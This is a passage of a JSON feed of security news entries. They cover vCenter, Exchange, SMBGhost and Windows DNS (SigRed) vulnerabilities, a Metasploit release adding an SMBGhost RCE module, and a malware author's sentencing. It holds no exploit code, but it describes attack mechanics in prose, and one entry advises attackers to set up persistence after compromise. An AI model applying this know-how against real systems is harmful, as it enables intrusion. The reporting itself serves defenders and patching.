prevalence of ransomware (whose operators often already have access to corporate networks via phished, leaked, reused, or otherwise stolen credentials). **Edit June 5, 2021:** Exploitation is now occurring in the wild. See AttackerKB for [full technical analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>).\n\nRapid7 Labs identified roughly 6,000 instances of vCenter Server exposed to the public internet as of May 26, 2021:\n\n\n\n## Recommendations\n\nVMware has a number of resources available for vCenter Server customers looking to understand and address CVE-2021-21985 and other vulnerabilities in this week\u2019s advisory, including a [blog post](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>) and a [supplemental FAQ](<https://core.vmware.com/resource/vmsa-2021-0010-faq>).\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](<https://kb.vmware.com/s/article/83829>). Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\nFor [further technical information of CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>), as well as community assessments of exploitability and attacker value, see AttackerKB. We'll update this blog post with more information as it becomes available.\n\n**Update June 5, 2021:** Multiple community sources have confirmed CVE-2021-21985 is [being exploited in the wild](<https://twitter.com/GossiTheDog/status/1400868390726733831>).", "cvss3": {}, "published": "2021-05-26T18:57:20", "type": "rapid7blog", "title": "CVE-2021-21985: What you need to know about the latest critical vCenter Server vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T18:57:20", "id": "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "href": "https://blog.rapid7.com/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-28T16:58:28", "description": "## RCE Exploit For CVE-2020-0796 (SMBGhost)\n\n\n\nThis week our very own Spencer McIntyre has added an exploit for [CVE-2020-0796](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=blog>), which leverages a vulnerability within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol to gain unauthenticated remote code execution against unpatched Windows 10 v1903 and v1909 systems. Previously, Metasploit offered an LPE version of this exploit but not RCE support. The exploit is heavily based on the [chompie1337/SMBGhost_RCE_PoC PoC](<https://github.com/chompie1337/SMBGhost_RCE_PoC>).\n\nNote that there is a high probability that, even when the exploit is successful, the remote target will crash within about 90 minutes. It is recommended that after a successful compromise, a persistence mechanism be established and the system be rebooted to avoid a Blue Screen of Death (BSOD).\n\n## Improved command history management\n\nCommunity member [pingport80](<https://github.com/pingport80>) has made improvements to Metasploit's command history management to now be context aware. The command history for both the main console and sub-shells, such as Pry and Metepreter, will now have their command history separated. This means that pressing the up arrow key within the console in these different contexts will now only show the command history for that specific context sub-shell, which should be more intuitive to users.\n\n## New module content (2)\n\n * [SMBv3 Compression Buffer Overflow](<https://github.com/rapid7/metasploit-framework/pull/15024>) by Spencer McIntyre, chompie1337, and hugeh0ge, which exploits [CVE-2020-0796](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=blog>) \\- This adds an exploit for CVE-2020-0796 which can be used to gain unauthenticated remote code execution against unpatched Windows 10 v1903 and v1909 systems.\n * [Git Ignore Retriever](<https://github.com/rapid7/metasploit-framework/pull/14984>) by N!ght Jmp - Adds an OSX Post exploitation module to retrieve `.gitignore` files that may contain pointers to files of interest\n\n## Enhancements and features\n\n * [#15062](<https://github.com/rapid7/metasploit-framework/pull/15062>) from [pingport80](<https://github.com/pingport80>) \\- Adds support for separating command history for the various sub-shells such as Meterpreter and Pry\n * [#15079](<https://github.com/rapid7/metasploit-framework/pull/15079>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This introduces the `meterpreter` key to the `compat` hash to better-provide Meterpreter session compatibility info to users, including printing the required Meterpreter extension(s) to the console in the event of a session incompatibility. Additionally, `post` modules will automatically load Meterpreter extensions used, provided that the module's Meterpreter compatibility requirements are annotated.\n * [#15199](<https://github.com/rapid7/metasploit-framework/pull/15199>) from [pingport80](<https://github.com/pingport80>) \\- This improves the `get_processes` API on non-Windows systems with support that fails back to enumerating the `/proc` directory when the `ps` utility is not present.\n * [#15220](<https://github.com/rapid7/metasploit-framework/pull/15220>) from [bogey3](<https://github.com/bogey3>) \\- This modification adds the ability to retrieve the OS version from \nan NTLMSSP type 2 message.\n * [#15242](<https://github.com/rapid7/metasploit-framework/pull/15242>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates the tables displayed by the `loot` command to be displayed without wrapping. This makes it easier for users to copy and paste the output.\n * [#15243](<https://github.com/rapid7/metasploit-framework/pull/15243>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a check method to the Apache Tomcat Ghostcat module\n * [#15246](<https://github.com/rapid7/metasploit-framework/pull/15246>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This refactors some common functionality into a cross-platform `Msf::Post::Process` mixin with support for multiple session types.\n\n## Bugs fixed\n\n * [#15216](<https://github.com/rapid7/metasploit-framework/pull/15216>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a mistake in the exploit for CVE-2021-21551 where the version fingerprinting is overly specific. Windows 10 build 18363 failed because it didn't match the explicit build number 18362. This PR changes the fingerprinting to use ranges to fix this problem.\n * [#15223](<https://github.com/rapid7/metasploit-framework/pull/15223>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This updates the `exploit/windows/local/tokenmagic` module by fixing a crash that occurs on some targets and moves the target validation logic to earlier in the module.\n * [#15236](<https://github.com/rapid7/metasploit-framework/pull/15236>) from [Apeironic](<https://github.com/Apeironic>) \\- This adds an additional check to the Linux `checkvm` module to fix a bug where it was failing to identify certain Xen environments such as those used within AWS.\n * [#15240](<https://github.com/rapid7/metasploit-framework/pull/15240>) from [mcorybillington](<https://github.com/mcorybillington>) \\- This fixes a typo that was present in the template for GitHub pull requests.\n * [#15241](<https://github.com/rapid7/metasploit-framework/pull/15241>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Removes the previously prototyped `RHOST_HTTP_URL` module option and feature flag as it had blocking edge cases for being enabled by default. A new implementation is being investigated.\n * [#15262](<https://github.com/rapid7/metasploit-framework/pull/15262>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Improved `msfvenom` to only wrap output if the output is going to STDOUT.\n * [#15267](<https://github.com/rapid7/metasploit-framework/pull/15267>) from [e2002e](<https://github.com/e2002e>) \\- This fixes a bug that was present within the Shodan search module where certain queries would cause an exception to be raised while processing the results.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.45...6.0.46](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-19T10%3A47%3A33-05%3A00..2021-05-27T16%3A09%3A36-04%3A00%22>)\n * [Full diff 6.0.45...6.0.46](<https://github.com/rapid7/metasploit-framework/compare/6.0.45...6.0.46>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-28T15:42:16", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2021-21551"], "modified": "2021-05-28T15:42:16", "id": "RAPID7BLOG:D560044511D0D460EB8BD73E6B8C9EB7", "href": "https://blog.rapid7.com/2021/05/28/metasploit-wrap-up-113/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-06T15:02:24", "description": "\n\nIf you've been keeping tabs on the state of vulnerabilities, you've probably noticed that Microsoft Exchange has been in the news more than usual lately. Back in March 2021, Microsoft [acknowledged a series of threats](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) exploiting zero-day CVEs in on-premises instances of Exchange Server. Since then, several related exploit chains targeting Exchange have [continued to be exploited in the wild](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>).\n\nMicrosoft [quickly](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) [released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) [patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>) to help security teams keep attackers out of their Exchange environments. So, what does the state of patching look like today among organizations running impacted instances of Exchange?\n\nThe answer is more mixed \u2014 and more troubling \u2014 than you'd expect.\n\n## What is Exchange, and why should you care?\n\nExchange is a popular email and messaging service that runs on Windows Server operating systems, providing email and calendaring services to tens of thousands of organizations. It also integrates with unified messaging, video chat, and phone services. That makes Exchange an all-in-one messaging service that can handle virtually all communication streams for an enterprise customer.\n\nAn organization's Exchange infrastructure can contain copious amounts of sensitive business and customer information in the form of emails and a type of shared mailbox called Public Folders. This is one of the reasons why Exchange Server vulnerabilities pose such a significant threat. Once compromised, Exchange's search mechanisms can make this data easy to find for attackers, and a robust rules engine means attackers can create hard-to-find automation that forwards data out of the organization.\n\nAn attacker who manages to get into an organization's Exchange Server could gain visibility into their Active Directory or even compromise it. They could also steal credentials and impersonate an authentic user, making phishing and other attempts at fraud more likely to land with targeted victims.\n\n## Sizing up the threats\n\nThe credit for discovering this recent family of Exchange Server vulnerabilities goes primarily to security researcher Orange Tsai, who overviewed them in an August 2021 [Black Hat talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>). He cited 8 vulnerabilities, which resulted in 3 exploit chains:\n\n * ****ProxyLogon:**** This vulnerability could allow attackers to use pre-authentication server-side request forgery (SSRF) plus a post-authentication arbitrary file write, resulting in remote code execution (RCE) on the server.\n * ****ProxyOracle:**** With a cookie from an authenticated user (obtained through a reflected XSS link), a Padding Oracle attack could provide an intruder with plain-text credentials for the user.\n * ****ProxyShell: ****Using a pre-authentication access control list (ACL) bypass, a PrivEsc (not going up to become an administrator but down to a user mailbox), and a post-authentication arbitrary file write, this exploit chain could allow attackers to execute an RCE attack.\n\nGiven the sensitivity of Exchange Server data and the availability of [patches and resources from Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to help defend against these threats, you'd think adoption of these patches would be almost universal. But unfortunately, the picture of patching for this family of vulnerabilities is still woefully incomplete.\n\n## A patchwork of patch statuses\n\nIn Rapid7's OCTO team, we keep tabs on the exposure for major vulnerabilities like these, to keep our customers and the security community apprised of where these threats stand and if they might be at risk. To get a good look at the patch status among Exchange Servers for this family of attack chains, we had to develop new techniques for fingerprinting Exchange versions so we could determine which specific hotfixes had been applied.\n\nWith a few tweaks, we were able to adjust our measurement approach to get a clear enough view that we can draw some strong conclusions about the patch statuses of Exchange Servers on the public-facing internet. Here's what we found:\n\n * Out of the 306,552 Exchange OWA servers we observed, 222,145 \u2014 or 72.4% \u2014were running an impacted version of Exchange (this includes 2013, 2016, and 2019).\n * Of the impacted servers, 29.08% were still unpatched for the ProxyShell vulnerability, and 2.62% were partially patched. That makes 31.7% of servers that may still be vulnerable.\n\n\n\nTo put it another, starker way: 6 months after patches have been available for the ProxyLogon family of vulnerabilities, 1 in 3 impacted Exchange Servers are still susceptible to attacks using the ProxyShell method.\n\nWhen we sort this data by the Exchange Server versions that organizations are using, we see the uncertainty in patch status tends to cluster around specific versions, particularly 2013 Cumulative Update 23. \n\n\n\nWe also pulled the server header for these instances with the goal of using the version of IIS as a proxy indicator of what OS the servers may be running \u2014 and we found an alarmingly large proportion of instances that were running end-of-life servers and/or operating systems, for which Microsoft no longer issues patch updates.\n\n\n\nThat group includes the two bars on the left of this graph, which represent 2007 and 2010 Exchange Server versions: 75,300 instances of 2010 and 8,648 instances of 2007 are still running out there on the internet, roughly 27% of all instances we observed. Organizations still operating these products can count themselves lucky that ProxyShell and ProxyLogon don't impact these older versions of Exchange (as far as we know). But that doesn't mean those companies are out of the woods \u2014 if you still haven't replaced Exchange Server 2010, you're probably also doing other risky things in your environment.\n\nLooking ahead, the next group of products that will go end-of-life are the Windows Server 2012 and 2012 R2 operating systems, represented in green and yellow, respectively, within the graph. That means 92,641 instances of Exchange \u2014 nearly a third of all Exchange Servers on the internet \u2014 will be running unsupported operating systems for which Microsoft isn't obligated to provide security fixes after they go end-of-life in 2023.\n\n## What you can do now\n\nIt's a matter of when, not if, we encounter the next family of vulnerabilities that lets attackers have a field day with huge sets of sensitive data like those contained in Exchange Servers. And for companies that haven't yet patched, ProxyShell and its related attack chains are still a real threat. Here's what you can do now to proactively mitigate these vulnerabilities.\n\n * First things first: If your organization is running one of the 1 in 3 affected instances that are vulnerable due to being unpatched, [install the appropriate patch](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) right away.\n * Stay current with patch updates as a routine priority. It is possible to build Exchange environments with near-100% uptimes, so there isn't much argument to be made for foregoing critical patches in order to prevent production interruptions.\n * If you're running a version of Exchange Server or Windows OS that will soon go end-of-life, start planning for how you'll update to products that Microsoft will continue to support with patches. This way, you'll be able to quickly and efficiently mitigate vulnerabilities that arise, before attackers take advantage of them.\n\nIf you're already a Rapid7 customer, there's good news: [InsightVM](<https://www.rapid7.com/products/insightvm/>) already has authenticated scans to detect these vulnerabilities, so users of the product should already have a good sense of where their Exchange environments stand. On the offensive side, your red teams and penetration testers can highlight the risk of running vulnerable Exchange instances with modules exercising [ProxyLogon](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/>) and [ProxyShell](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>). And as our research team continues to develop techniques for getting this kind of detailed information about exposures, we ensure our products know about those methods so they can more effectively help customers understand their vulnerabilities.\n\nBut for all of us, these vulnerabilities are a reminder that security requires a proactive mindset \u2014 and failing to cover the basics like upgrading to supported products and installing security updates leaves organizations at risk when a particularly thorny set of attack chains rears its head.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T14:07:12", "type": "rapid7blog", "title": "For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-06T14:07:12", "id": "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "href": "https://blog.rapid7.com/2021/10/06/for-microsoft-exchange-server-vulnerabilities-patching-remains-patchy/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-02-25T02:52:39", "description": "[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nVMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system to find other vulnerable points of network entry to take over affected systems.\n\nPositive Technologies researcher Mikhail Klyuchnikov discovered two of the flaws in vCenter Server, the centralized management and automation platform for VMware\u2019s vSphere virtualization platform, which\u2014given VMware\u2019s dominant position in the market\u2014is used by the majority of enterprise data centers. Among its duties, vCenter Server manages virtual machines, multiple ESXi hypervisor hosts and other various dependent components from a central management dashboard.\n\n## **Where the VMware Flaws Were Found, What\u2019s Effected? **\n\nThe researcher found the most critical of the flaws, which is being tracked as [CVE-2021-21972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972>) and has a CVSS v3 score of 9.8, in a vCenter Server plugin for vROPs in the vSphere Client functionality, according to [an advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) posted online Tuesday by VMware.\n\n\u201cA malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\u201d the company said.\n\nThe plugin is available in all default installations\u2014potentially giving attackers a wide attack surface\u2013and vROPs need not be present to have this endpoint available, according to VMware.\n\nThe main threat in terms of exploiting the vulnerability comes from insiders who have penetrated the protection of the network perimeter using other methods\u2013such as social engineering or web vulnerabilities\u2013or have access to the internal network using previously installed backdoors, according to Positive Technologies.\n\nKlyuchnikov said the VMware flaw poses \u201cno less threat\u201d than a notoriously easy-to-exploit[ Citrix RCE vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>), [CVE-2019-19781](<https://www.google.ru/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiOm6_Z4rnuAhWwlosKHTPHARo4ChAWMAJ6BAgLEAI&url=https://www.forbes.com/sites/daveywinder/2020/01/25/critical-security-warning-as-shitrix-hackers-ramp-up-critical-citrix-vulnerability-cve201919781-attacks/&usg=AOvVaw2MEaqcCGRpYlOcxC-Bey_j>), which was discovered two years ago affecting more than 25,000 servers globally. It is especially dangerous because \u201cit can be used by any unauthorized user,\u201d he said.\n\n\u201cThe error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server,\u201d Klyuchnikov explained. \u201cAfter receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system, such as information about virtual machines and system users.\u201d\n\n## How is CVE-2021-21972 Exploited?\n\nIn the case in which vulnerable software can be accessed from the internet, an external attacker can break into a company\u2019s external perimeter and also gain access to sensitive data, he added. This scenario is highly likely based on previous pentests executed by Positive Technologies, which allowed researchers to breach the network perimeter and gain access to local network resources in 93 percent of companies, according to the company.\n\nAnother flaw patched by VMware in the update also has potential for remote code execution and affects the hypervisor [VMware ESXi](<https://threatpost.com/vmware-critical-flaw-esxi-hypervisor/161457/>) , the company said. [CVE-2021-21974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974>), with a CVSSv3 base score of 8.9. is a heap-overflow vulnerability in the OpenSLP component as used in an ESXi host.\n\nA threat actor who\u2019s already inside the same network segment as an ESXi host and has access to port 427 can use the vulnerability to trigger the heap-overflow issue in the OpenSLP service, resulting in remote code execution, according to VMware.\n\nThe other flaw Klyuchnikov discovered\u2014tracked as [CVE-2021-21973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21973>) and the least serious of the three\u2013is a Server Side Request Forgery (SSRF) vulnerability due to improper validation of URLs in a vCenter Server plugin with a CVSS score of 5.3, according to VMWare. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure,\u201d the company said.\n\nUnauthorized users can use the flaw to send requests as the targeted server to help threat actors develop further attacks. Used in combination with the other vulnerabilities, attackers could leverage it to scan the company\u2019s internal network and obtain information about the open ports of various services, Klyuchnikov said.\n\n## What VMware is Recommending for a Fix to the Data Center Bugs?\n\nVMware advised customers to install all updates provided to affected deployments to remediate the threat the vulnerabilities pose. The company also provided workarounds for those who can\u2019t immediately update their systems.\n\nPositive Technologies also recommended that companies affected who have vCenter Server interfaces on the perimeter of their organizations remove them, and also allocate the interfaces to a separate VLAN with a limited access list in the internal network, the company said.\n\n**_Is your small- to medium-sized business an easy mark for attackers?_**\n\n**Threatpost WEBINAR:** _ Save your spot for \u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this **LIVE **webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-24T17:14:55", "type": "threatpost", "title": "VMWare Patches Critical RCE Flaw in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-24T17:14:55", "id": "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "href": "https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-16T08:28:41", "description": "A critical Microsoft Windows Server bug opens company networks to hackers, allowing them to potentially seize control of IT infrastructures. Microsoft issued a patch for the bug on Tuesday as part of its July Patch Tuesday roundup.\n\nIt turns out that the bug is 17 years old. Impacted are Windows Server versions from 2003-2019. The bug, found by researchers at Check Point, received a severity warning of 10 \u2013 the highest allowed. Most concerning to researchers however is that the bug is wormable, meaning a single exploit of the flaw can trigger a chain reaction that allows attacks to spread from one computer to another.\n\n\u201c[The] security flaw would enable a hacker to craft malicious DNS queries to the Windows DNS server, and achieve arbitrary code execution that could lead to the breach of the entire infrastructure,\u201d according to Check Point researcher Sagi Tzaik, who is credited for finding the flaw.\n\nMicrosoft released a patch for the vulnerability, identified as [CVE-2020-1350,](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) and [urged customers](<https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/>) to prioritize an update to their systems. Check Point is calling the bug SigRed \u2013 a nod to the vulnerable DNS component and function \u201cdns.exe\u201d.\n\nA hacker can gain Domain Administrator rights over the server, \u201cenabling the hacker to intercept and manipulate users\u2019 emails and network traffic, make services unavailable, harvest users\u2019 credentials and more. In effect, the hacker could seize complete control of a corporation\u2019s IT,\u201d researchers wrote, in a technical analysis of the bug, posted Tuesday.\n\n## **Patching Is an Imperative **\n\nUpping the chance for exploitation by a hacker is the relatively simple prerequisites needed to exploit the vulnerability. \u201cThe likelihood of this vulnerability being exploited is high, as we internally found all of the primitives required to exploit this bug, which means a determined hacker could also find the same resources,\u201d researchers noted.\n\n\u201cThis issue results from a flaw in Microsoft\u2019s DNS server role implementation and affects all Windows Server versions. Non-Microsoft DNS Servers are not affected,\u201d [Microsoft wrote in a post Tuesday](<https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/>). \u201cWhile this vulnerability is not currently known to be used in active attacks, it is essential that customers apply Windows updates to address this vulnerability as soon as possible.\u201d\n\nMechele Gruhn, principal security PM manager at the Microsoft Security Response Center, noted that \u201cif applying the update quickly is not practical, a [registry-based workaround is available](<https://support.microsoft.com/en-us/help/4569509>) that does not require restarting the server. The update and the workaround are both detailed in [CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>).\u201d\n\n\u201cCVE-2020-1350, a wormable remote code execution vulnerability in Windows DNS Server, could very well be the most critical Windows vulnerability released this year, receiving a rare 10 out of 10 CVSS score,\u201d Chris Hass, director of information security and research at Automox, told Threatpost.\n\n\u201cA wormable vulnerability like this is an attacker\u2019s dream. An unauthenticated hacker could send specially crafted packets to the vulnerable Windows DNS Server to exploit the machine, allowing for arbitrary code to be run in the context of the local system account. Not only will the attacker have full control of the system, but they will also be able to leverage the server as a distribution point, allowing the attacker to spread malware between systems without any user interaction. This wormable capability adds a whole other layer of severity and impact, allowing malware authors to write ransomware similar to notable wormable malware such as Wannacry and NotPetya,\u201d Hass said.\n\n## **Exploiting a 17-Year-Old Bug**\n\nThe flaw itself is an integer-overflow bug that can trigger a heap-based buffer overflow attack tied to the DNS module called dns.exe, which is responsible for answering DNS queries on Windows Servers.\n\nBy abusing the dns.exe module, two attack surfaces were created by researchers. One is a \u201cbug in the way the DNS server parses an incoming query.\u201d And the second is \u201ca bug in the way the DNS server parses a response (answer) for a forwarded query.\u201d\n\nThe attack requires researchers to first force a Windows DNS Server to parse responses from a malicious DNS NameServer. This employs the dns.exe module, which parses all supported response types. One of those supported response types is for a Secure Internet Access (SIG) query called SIG(O). Researchers focused their attention on creating a request that exceeded the maximum size request of 65,535 bytes, and causing the overflow. By using compressed data, researcher were able to create a successful crash.\n\n\u201cAlthough it seems that we crashed because we were trying to write values to unmapped memory, the heap can be shaped in a way that allows us to overwrite some meaningful values,\u201d they wrote.\n\nThis local attack then was replicated remotely, by \u201csmuggling DNS inside HTTP\u201d requests on Microsoft Explorer and Microsoft Edge browsers (Google Chrome and Firefox are not vulnerable to this type of attack). Because DNS can be transported over TCP \u2014 and Windows DNS Server supports this connection type \u2013 researchers were able to craft a HTTP payload.\n\n\u201cEven though this is an HTTP payload, sending it to our target DNS server on port 53 causes the Windows DNS Server to interpret this payload as if it was a DNS query,\u201d they wrote. Researchers were able to circumvent HTTP protections against similar malicious HTTP payloads by \u201csmuggling\u201d DNS query data inside the POST data located in the HTTP request.\n\nChromium-class browsers (Google Chrome and Mozilla Firefox) do not allow HTTP requests to port 53, therefore the bug can only be exploited Internet Explorer and Microsoft Edge.\n\n\u201cSuccessful exploitation of this vulnerability would have a severe impact, as you can often find unpatched Windows Domain environments, especially Domain Controllers. In addition, some internet service providers (ISPs) may even have set up their public DNS servers as WinDNS,\u201d Check Point wrote.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-14T19:01:04", "type": "threatpost", "title": "Critical DNS Bug Opens Windows Servers to Infrastructure Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-14T19:01:04", "id": "THREATPOST:96E775E045D4DF55CC1B9A3AA0C28F70", "href": "https://threatpost.com/critical-dns-bug-windows-servers-infrastructure-takeover/157427/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:41:40", "description": "Marcus Hutchins, the researcher hailed for squashing the WannaCry ransomware outbreak in May 2017, has been spared jail time over the creation of the infamous Kronos banking malware.\n\nThe 25-year-old British researcher was sentenced on Friday to time served and one year of supervised release over charges relating to the creation of the Kronos malware, [according to reports](<https://twitter.com/emptywheel/status/1154806457189175301>).\n\nThe sentencing of Hutchins, known for his online Twitter name and blog \u2018MalwareTech,\u2019 has drawn international interest as the researcher has been hailed as a hero for his part in stopping the global [WannaCry outbreak in 2017](<https://threatpost.com/wannacry-bitcoin-withdrawn-killswitch-researcher-detained-in-nevada/127182/>). He was detained not long after in August 2017.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cSentenced to time served! Incredibly thankful for the understanding and leniency of the judge, the wonderful character letter you all sent, and everyone who helped me through the past two years, both financially and emotionally,\u201d the researcher said on his Twitter account after the sentencing.\n\n> Sentenced to time served! Incredibly thankful for the understanding and leniency of the judge, the wonderful character letter you all sent, and everyone who helped me through the past two years, both financially and emotionally.\n> \n> \u2014 MalwareTech (@MalwareTechBlog) [July 26, 2019](<https://twitter.com/MalwareTechBlog/status/1154820057085677570?ref_src=twsrc%5Etfw>)\n\nHutchins was [indicted](<https://threatpost.com/wannacry-hero-arrested-one-of-two-charged-with-distribution-of-kronos-malware/127186/>) in 2017 and charged with writing the [Kronos malware](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>), a banking trojan first discovered in 2014 that is capable of stealing credentials and using web injects for banking websites. Hutchins and another individual whose name was redacted from the original indictment, allegedly advertised the malware for sale on a number of internet forums, including the dismantled [AlphaBay](<https://threatpost.com/us-european-law-enforcement-shutter-massive-alphabay-market/126947/>) 